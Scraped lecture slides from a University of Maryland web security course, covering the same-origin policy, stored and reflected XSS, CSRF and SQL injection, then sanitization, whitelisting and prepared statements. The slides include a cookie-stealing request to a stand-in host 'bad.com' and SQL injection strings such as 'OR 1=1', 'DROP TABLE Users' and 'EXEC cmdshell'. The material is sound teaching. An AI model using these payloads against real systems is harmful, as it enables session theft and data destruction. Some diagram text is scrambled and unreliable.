Web security II - University Of Maryland

Web security II - University Of Maryland

Web security II With material from Dave Levin, Mike Hicks, Lujo Bauer, Collin Jackson and Michelle Mazurek Dynamic web pages Rather than just HTML, web pages can include a program written in Javascript: Hello, Javascript no relation

to Java Powerful web page programming language Scripts embedded in pages returned by the web server Scripts are executed by the browser. They can: Alter page contents (DOM objects) Track events (mouse clicks, motion, keystrokes)

Issue web requests & read replies Maintain persistent connections (AJAX) Read and set cookies What could go wrong? Browsers need to confine Javascripts power A script on attacker.com should not be able to:

Alter the layout of a bank.com page Read user keystrokes from a bank.com page Read cookies belonging to bank.com Same Origin Policy Browsers provide isolation for javascript via SOP Browser associates web page elements

Layout, cookies, events with their origin Hostname (bank.com) that provided them SOP = only scripts received from a web pages origin have access to the pages elements Cross-site scripting (XSS) Two types of XSS 1. Stored (or persistent) XSS attack Attacker leaves script on the bank.com server Server later unwittingly sends it to your browser

Browser executes it within same origin as bank.com Stored XSS attack GET http://bad.com/steal?c=document.cookie Client Browser 4 Execute the malicious script as though the server meant us to run it ata d e bl a

u l va l a e 5St 2 Re 3Re 5Pe 1 qu e cei v rfo bad.com

st c em ont ent Inject malicious script alic iou rm s sc att ript ack er a ctio n

bank.com GET http://bank.com/transfer?amt=9999&to=attacker Stored XSS Summary Target: User with Javascript-enabled browser who visits user-influenced content on a vulnerable web service Attack goal: Run script in users browser with same access as provided to servers regular scripts (i.e., subvert SOP) Attacker needs: Ability to leave content on the web server (forums, comments, custom profiles)

Optional: a server for receiving stolen user information Key trick: Server fails to ensure uploaded content does not contain embedded scripts Where have we heard this before? Your friend and mine, Samy Samy embedded Javascript in his MySpace page (2005) MySpace servers attempted to filter it, but failed

Users who visited his page ran the program, which Made them friends with Samy Displayed but most of all, Samy is my hero on profile Installed script in their profile to propagate From 73 to 1,000,000 friends in 20 hours Took down MySpace for a weekend Felony computer hacking; banned from computers for 3 years Two types of XSS 1. Stored (or persistent) XSS attack

Attacker leaves their script on the bank.com server The server later unwittingly sends it to your browser Your browser, none the wiser, executes it within the same origin as the bank.com server 2. Reflected XSS attack Attacker gets you to send bank.com a URL that includes Javascript bank.com echoes the script back to you in its response

Your browser executes the script in the response within the same origin as bank.com Reflected XSS attack Client Browser 5 Execute the malicious script as though the server meant us to run it ite s ge b a e p

w it ous i c i 1 Vis l a m e ta eiv a c d e le 2R b a u val

l a 6Ste 3C lick on 4 E lin k cho use 6Pe r in rfo put rm a tta c ker

a bad.com URL specially crafted by the attacker ctio n bank.com Echoed input The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response Input from bad.com: http://victim.com/search.php?term=socks Result from victim.com: Search results

Results for socks: . . . Exploiting echoed input Input from bad.com: http://victim.com/search.php?term= Result from victim.com: Search results Results for . . . Browser would execute this within victim.coms origin

Reflected XSS Summary Target: User with Javascript-enabled browser; vulnerable web service that includes parts of URLs it receives in the output it generates Attack goal: Run script in users browser with same access as provided to servers regular scripts (subvert SOP) Attacker needs: Get user to click on speciallycrafted URL. Optional: A server for receiving stolen user information

Key trick: Server does not ensure its output does not contain foreign, embedded scripts XSS Defense: Filter/Escape Typical defense is sanitizing: remove executable portions of user-provided content or ... Libraries exist for this purpose Better defense: White list

Instead of trying to sanitize, validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous spec of what should be allowed.

XSS vs. CSRF Do not confuse the two: XSS exploits the trust a client browser has in data sent from the legitimate website So the attacker tries to control what the website sends to the client browser CSRF exploits the trust a legitimate website has in data sent from the client browser So the attacker tries to control what the client browser sends to the website

SQL injection http://xkcd.com/327/ Server-side data Client Server Browser Web server (Private) Data Databas e Long-lived state, stored in a separate database Need to protect this state

from illicit access and tampering SQL (Standard Query Language) Table Users Table name Name Gender Age Email Password Connie F

12 [email protected] j3i8g8ha Steven M 14 [email protected] a0u23bt Greg M 34 [email protected]

[email protected] 0aergja Vidalia M 35 [email protected] 1bjb9a93 Pearl F 10000 [email protected] ziog9gga Column

SELECT Age FROM Users WHERE Name=Greg; 34 UPDATE Users SET [email protected] WHERE Age=34; -- this is a comment INSERT INTO Users Values(Pearl, F, ...); DROP TABLE Users; Row (Record) Server-side code Website Login code (PHP) $result = mysql_query(select * from Users where(name=$user and password=$pass);); Suppose you successfully log in as $user if this returns any results How could you exploit this?

SQL injection frank OR 1=1); -$result = mysql_query(select * from Users where(name=$user and password=$pass);); $result = mysql_query(select * from Users where(name=frank OR 1=1); -and password=whocares);); Login successful! Problem: Data and code mixed up together SQL injection: Worse frank OR 1=1); DROP TABLE Users; -$result = mysql_query(select * from Users where(name=$user and password=$pass);); $result = mysql_query(select * from Users where(name=frank OR 1=1); DROP TABLE Users; -and password=whocares);); Can chain together statements with semicolon: STATEMENT 1 ; STATEMENT 2 SQL injection: Even worse ; EXEC cmdshell ; -$result = mysql_query(select * from Users

where(name=$user and password=$pass);); $result = mysql_query(select * from Users where(name=); EXEC cmdshell ; -and password=whocares);); http://xkcd.com/327/ SQL injection attacks are common 25 % 20 of vulnerabilities that are SQL injection 15 10 5 0 http://web.nvd.nist.gov/view/vuln/statistics SQL injection countermeasures

The underlying issue $result = mysql_query(select * from Users where(name=$user and password=$pass);); This one string combines the code and the data Similar to buffer overflows When the boundary between code and data blurs, we open ourselves up to vulnerabilities The underlying issue $result = mysql_query(select * from Users where(name=$user and password=$pass);); select / from / where *

Users and = name Should be data, not code = $user $user password $pass Prevention: Input validation

We require input of a certain form, but we cannot guarantee it has that form, so we must validate it Just like we do to avoid buffer overflows Making input trustworthy Check it has the expected form, reject it if not Sanitize by modifying it or using it such that the result is correctly formed Sanitization: Blacklisting

; - Delete the characters you dont want Downside: Lupita Nyongo You want these characters sometimes! How do you know if/when the characters are

bad? Downside: How to know youve IDd all bad chars? Sanitization: Escaping Replace problematic characters with safe ones Change to \ Change ; to \;

Change - to \- Change \ to \\ Hard by hand, there are many libs & methods magic_quotes_gpc = On mysql_real_escape_string() Downside: Sometimes you want these in your SQL! And escaping still may not be enough

Checking: Whitelisting Check that the user input is known to be safe E.g., integer within the right range Rationale: Given invalid input, safer to reject than fix Fixes may result in wrong output, or vulnerabilities Principle of fail-safe defaults

Downside: Hard for rich input! How to whitelist usernames? First names? Sanitization via escaping, whitelisting, blacklisting is HARD. Can we do better? Sanitization: Prepared statements Treat user data according to its type Decouple the code and the data $result = mysql_query("select * from Users where(name=$user and password=$pass);"); $db = new mysql("localhost", "user", "pass", "DB"); $statement = $db->prepare("select * from Users

where(name=? and password=?);"); Bind variables $statement->bind_param("ss", $user, $pass); $statement->execute(); Bind variables are typed Using prepared statements $statement = $db->prepare("select * from Users $statement = * from Users where(name=? andselect password=?);"); where(name=$user and password=$pass);; $stmt->bind_param("ss", $user, $pass);

select / from / where * Users and = name = frank ? $user OR 1=1); -- password $pass ? Binding is only applied to the leaves,

so the structure of the tree is fixed Additional For defense in depth, alsomitigation try to mitigate any attack But should always do input validation in any case! Limit privileges; reduces power of exploitation Limit commands and/or tables a user can access

e.g., allow SELECT on Orders but not Creditcards Encrypt sensitive data; less useful if stolen May not need to encrypt Orders table But certainly encrypt creditcards.cc_numbers Input validation, ad infinitum Many other webbased bugs, ultimately due to trusting external input (too much)

http://www.jantoo.com/cartoon/08336711 Takeaways: Verify before trust Improperly validated input causes many attacks Common to solutions: check or sanitize all data Whitelisting: More secure than blacklisting Checking: More secure than sanitization

Proper sanitization is hard All data: Are you sure you found all inputs? Dont roll your own: libraries, frameworks, etc.

Recently Viewed Presentations

  • 3-D Printing or Additive Manufacturing or Desktop Manufacturing

    3-D Printing or Additive Manufacturing or Desktop Manufacturing

    We also have high-end printing on campus. Objet 260 Printer. Multi-material. Hard and flexible in one print. Multiple colors. High accuracy <1 mm resolution. Large volume. 250x250x250 mm. Airway model with stiff bones and soft tissue. Rigid, clear heart model....
  • Area of Triangles Return to table of contents

    Area of Triangles Return to table of contents

    Area of Triangles Return to table of contents Area of a Triangle Let's use the same process as we did for the rectangle & parallelogram. How many 1 ft2 tiles fit across the bottom of the triangle? Area of a...
  • Sensation - Weebly

    Sensation - Weebly

    Cells contained in the occipital cortex. Includes… Simple cells (edge detectors) - respond to lines or edges . Complex cells - respond to the motion and color of objects . Hypercomplex cells - respond to an object's orientation, movement, shape,...
  • Chapter 2

    Chapter 2

    1. Basics. Study of the relationship between time and money. Money in the future is not worth the same as it is today. because if you had the money today you could invest it and earn interest
  • The new German languages GCSE: CO NSI DE

    The new German languages GCSE: CO NSI DE

    The overall rubrics containing instructions to students may continue to be in English, as at present. Questions for the majority of modern foreign languages may be set in the assessed language or English, as appropriate to the task. They should...
  • Genocide - Mr. Greaves&#x27; Social Studies Site

    Genocide - Mr. Greaves' Social Studies Site

    - What is genocide? - Where has it occurred? Record your and your partner's answers on a sheet of paper that you will turn in at the end of the period. * * * * * * * * Armenian...
  • Assembly Instructions - Mifram Security

    Assembly Instructions - Mifram Security

    Safety Warning. Note that several parts are heavy (21 kg) and sharp.pay attention during unloading, assembling and packing . Elements Placed upright prior to being joined can fall on their side and create a hazard
  • Heavy Weather - Telus

    Heavy Weather - Telus

    John F. Wison, 'Heavy Weather Guide' The Voyageur's Handbook - Beth Leonard The International Marine Book of Sailing - Robby Robinson Heavy Weather Sailing - K. Adlard Coles Videos - You Tube * Reality is that, with a little luck,...